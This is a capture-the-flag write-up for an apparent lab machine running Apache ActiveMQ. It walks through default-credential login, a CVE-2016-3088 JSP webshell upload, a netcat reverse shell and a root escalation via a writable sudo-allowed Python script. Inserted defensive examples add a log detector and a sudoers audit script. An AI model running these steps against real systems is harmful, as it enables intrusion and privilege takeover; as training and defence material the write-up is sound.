Writeup broker{Nightlovel}
Hello everyone, I hope this write-up is useful for the community, since it is the first one I have written for you. Greetings!
SCAN
First, scan the ports
Lately I have been using a Python script called "threader3000" to perform scans and save time; it can also be done the traditional way :D
pip install threader3000
Add the IP of the machine to the hosts file (in my case as broker.thm) and run threader3000
threader3000
Choose option 1 to run an nmap scan against the open ports it found, with service detection and default scripts, or run nmap directly (note that -oN takes an output file name, so the target goes last):
nmap -p22,1883,8161,41791 -sV -sC -T4 -Pn -oN broker.nmap broker.thm
ENUMERATE
Now discover directories or files with gobuster:
gobuster dir -u http://broker.thm:8161/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sql
Interesting directories: admin and api. Let's go to the admin site.
SEARCH AND TRY
Generally I try default passwords on any login in case I get lucky.
For example:
admin:admin
user:admin
admin:user
admin:password
Anyway, the documentation or a Google search will show the product's default passwords.
Now we enter these credentials and we are already admin :D
EXPLOIT || CVE-2016-3088
At this point I was really stuck for a long time, since I started looking for the ActiveMQ version and some exploits or CVEs; finally I found a Python script on GitHub which uploads a webshell written in JSP.
Finally, CVE-2016-3088:
git clone https://github.com/coffeehb/Some-PoC-oR-ExP
cd Some-PoC-oR-ExP/ActiveMQExP
Now use the Python script to upload a webshell to the /api/ directory, which allows PUT operations and therefore lets us upload files; it can also be done with curl.
python2.7 ActiveMQExP.py -url http://broker.thm:8161/ -user admin -pass admin -shell /root/Desktop/cmd.jsp
First upload a txt file to check that PUT works.
Then we open the path where our webshell was uploaded (Ctrl + double-click on the URL). Ta-da!!
At this point, try simple commands such as cat, whoami, ls. I also realized that we can read the /etc/shadow file, but I could not crack the password since it is SHA-512, which is very difficult.
Here you can find several flags.
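From the defender's side, the trace this leaves in the broker's HTTP request log is distinctive: write methods against the web console, followed by a request for the very file that was just uploaded. The following is an added example, not part of this write-up or of the ActiveMQ project. It parses a few constructed NCSA-style request-log lines (the default layout of a Jetty request log; that request logging is enabled for the embedded Jetty, and that the field order matches, are assumptions about the deployment) and flags that upload-then-execute sequence.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample lines in NCSA common log format; they are not taken
# from the machine in the write-up. The sequence mirrors the technique:
# a harmless PUT to test write access, a PUT of a JSP file, then a GET of it.
SAMPLE_LOG = """\
10.10.14.5 - - [03/Mar/2023:10:00:01 +0000] "GET /admin/ HTTP/1.1" 200 4210
10.10.14.5 - - [03/Mar/2023:10:00:05 +0000] "PUT /api/test.txt HTTP/1.1" 204 0
10.10.14.5 - - [03/Mar/2023:10:00:09 +0000] "PUT /api/cmd.jsp HTTP/1.1" 204 0
10.10.14.5 - - [03/Mar/2023:10:00:20 +0000] "GET /api/cmd.jsp?cmd=whoami HTTP/1.1" 200 58
10.10.14.9 - - [03/Mar/2023:10:01:00 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 9001
"""

# host ident authuser [timestamp] "METHOD path protocol" status bytes
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Methods a browser-driven admin console legitimately uses.
READ_ONLY = {"GET", "HEAD", "POST", "OPTIONS"}
# Extensions the servlet container would execute rather than serve as data.
SERVER_SIDE_EXT = (".jsp", ".jspx", ".war")


@dataclass
class Finding:
    line_no: int
    src: str
    reason: str


def analyze(log_text: str) -> list[Finding]:
    """Flag write methods against the console and later requests for uploaded files."""
    findings: list[Finding] = []
    uploaded: set[str] = set()          # paths that received a successful PUT
    for n, raw in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(raw)
        if not m:
            continue                    # unparsable line: skip rather than crash
        method, status = m["method"], int(m["status"])
        base = m["path"].split("?", 1)[0]
        if method not in READ_ONLY:
            sev = "high" if base.lower().endswith(SERVER_SIDE_EXT) else "medium"
            findings.append(Finding(n, m["src"], f"{sev}: {method} {base} against the web console"))
            if method == "PUT" and 200 <= status < 300:
                uploaded.add(base)
        elif base in uploaded:
            findings.append(Finding(n, m["src"], f"high: request for previously uploaded file {base}"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f.line_no} from {f.src}: {f.reason}")
```

The ordinary admin traffic on lines 1 and 5 produces nothing; the three findings are the text-file PUT (medium), the JSP PUT (high) and the later GET of that JSP (high). Correlating on the uploaded path is what separates a real webshell from a one-off probe.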
Start a netcat listener on your machine on port 4242:
nc -lnvp 4242
After this I started testing reverse shells; I tried different methods (bash TCP, ruby, python, etc.) and finally I used traditional netcat and it worked.
Connection received.
We upgrade the shell to get a more stable TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z (pressed together)
stty raw -echo;fg
reset
We now have our stable shell.
PRIVILEGE ESCALATION
We check what we are allowed to run with sudo.
We look at this file to see what permissions we have on it.
We have write permission, so we modify the Python script to obtain a bash shell as root:
nano subscribe.py
Remove the content and replace it with the following:
import pty
pty.spawn("/bin/bash")
Save the script and execute it with sudo:
sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
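The root cause here is a sudo rule whose target is a file that a non-root user can edit: sudo only authorises the command line, so whoever can rewrite the script runs as root. The following is an added example, not part of this write-up, of the audit a defender would run over /etc/sudoers (or a file from /etc/sudoers.d): every absolute path in each rule, interpreter and script alike, must be root-owned and not group- or world-writable, and must not sit in a world-writable directory without the sticky bit. The demo builds two scripts in a temporary directory with a placeholder account name; since the demo cannot create root-owned files, it passes the current uid as the trusted owner, whereas a real audit passes 0.

```python
import os
import re
import stat
import tempfile

# One sudoers user specification, e.g.
#   svc ALL=(ALL) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmd>.+?)\s*$"
)


def file_problems(path, trusted_uid=0):
    """Reasons a file named in a sudo rule could be altered by an unprivileged user."""
    reasons = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing (rule is dead, or the path may be creatable by others)"]
    if st.st_uid != trusted_uid:
        reasons.append(f"{path}: owned by uid {st.st_uid}, expected {trusted_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append(f"{path}: group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append(f"{path}: world-writable")
    parent = os.path.dirname(path) or "/"
    pst = os.stat(parent)
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        reasons.append(f"{parent}: world-writable directory without sticky bit, file can be replaced")
    return reasons


def audit_sudoers(text, trusted_uid=0):
    """Map each command in the rules to the problems found with the files it names."""
    report = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m["cmd"].split(","):          # a rule may list several commands
            cmd = cmd.strip()
            problems = []
            for token in cmd.split():            # interpreter and script arguments alike
                if token.startswith("/"):
                    problems += file_problems(token, trusted_uid)
            report[cmd] = problems
    return report


def demo():
    """Two scripts in a temp dir: one locked down, one writable by everyone."""
    tmp = tempfile.mkdtemp()
    safe = os.path.join(tmp, "report.py")
    unsafe = os.path.join(tmp, "subscribe.py")
    for p in (safe, unsafe):
        with open(p, "w") as f:
            f.write("print('hello')\n")
    os.chmod(safe, 0o755)
    os.chmod(unsafe, 0o777)      # the misconfiguration: anyone can rewrite the script
    rules = f"""
# constructed sample rules; 'svc' is a placeholder account
svc ALL=(ALL) NOPASSWD: {unsafe}
svc ALL=(root) {safe}
"""
    # A real audit uses trusted_uid=0; the demo cannot create root-owned files,
    # so the current user stands in for root here.
    return audit_sudoers(rules, trusted_uid=os.getuid())


if __name__ == "__main__":
    for cmd, problems in demo().items():
        print(cmd, "->", problems or "ok")
```

The fix on the target side is the same check in reverse: the script should be owned by root with mode 0755 (or tighter) and live in a root-owned directory, and the rule should name a fixed, root-controlled interpreter.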
NOW YOU ARE ROOT!!! EXCELLENT, NICE JOB
Thanks for reading this far; if you have any questions, do not hesitate to contact me.